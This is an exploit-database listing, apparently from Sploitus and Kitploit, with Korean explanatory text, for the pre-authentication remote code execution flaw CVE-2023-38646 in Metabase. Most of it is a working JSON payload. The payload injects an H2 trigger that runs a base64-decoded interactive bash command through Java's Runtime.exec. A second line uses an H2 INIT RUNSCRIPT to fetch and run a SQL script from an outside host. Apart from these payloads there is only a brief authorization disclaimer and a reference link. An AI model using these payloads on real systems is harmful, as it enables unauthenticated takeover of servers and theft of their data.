Sploitus

Exploit for Another-Metabase-RCE

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN46 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0UTL4NDER-ANOTHER-METABASE-RCE-CVE-2023-38646
### Metabase의 사전 인증 RCE(CVE-2023-38646) ν™•μž₯ μ„€λͺ… μ—¬κΈ°

이것은 H2 및 PostgreSQL μ—”μ§„μ—μ„œ 'λ°μ΄ν„°λ² μ΄μŠ€κ°€ 이미 μ‚¬μš© 쀑' 였λ₯˜λ₯Ό ν”Όν•˜λŠ” 데 도움이 λ˜μ—ˆμŠ΅λ‹ˆλ‹€.

root@kitploit:~
    
    
    {
    "token": "TOKEN",
    "details":
    {
     "is_on_demand": false,
     "is_full_sync": false,
     "is_sample": false,
     "cache_ttl": null,
     "refingerprint": false,
     "auto_run_queries": true,
     "schedules":{},
     "details":
     {
      "advanced-options":true,
      "classname":"org.h2.Driver",
      "subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
      "subprotocol": "h2"
     },
     "engine": "postgres",
     "name": "x"
    }}
    

INIT μŠ€ν¬λ¦½νŠΈμ™€ ν•¨κ»˜ h2λ₯Ό μ—”μ§„μœΌλ‘œ 직접 μ‚¬μš©ν•˜λŠ” λŒ€μ‹ , μΏΌλ¦¬μ—μ„œ μ œκ±°λ˜μ—ˆκΈ° λ•Œλ¬Έμ— μ—¬μ „νžˆ h2 엔진에 λŒ€ν•œ db 쿼리λ₯Ό μ‚¬μš©ν•©λ‹ˆλ‹€.

INIT 슀크립트 `mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'`

### .sql νŒŒμΌμ—μ„œ μ…Έ λͺ…령을 μ‹€ν–‰ν•˜λŠ” 방법을 μ§€μ •ν•©λ‹ˆλ‹€.

* * *

# μ°Έμ‘°

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase

### λ©”λͺ¨λ‘œ μž‘μ„±λ˜μ—ˆμœΌλ©°, λͺ¨ν˜Έν•œ λ¬Έμ„œλ‘œ κ°„μ£Όν•˜μ‹­μ‹œμ˜€. μ–΄λ–€ λŒ€μƒμ— λŒ€ν•΄ μ—΄κ±°, μ΅μŠ€ν”Œλ‘œμž‡ λ˜λŠ” λ‹¨μˆœνžˆ ν…ŒμŠ€νŠΈν•˜λ €λ©΄ λ°˜λ“œμ‹œ κΆŒν•œμ΄ μžˆμ–΄μ•Ό ν•©λ‹ˆλ‹€.

## λŒ“κΈ€κ³Ό κΈ°μ—¬λŠ” ν™˜μ˜ν•©λ‹ˆλ‹€.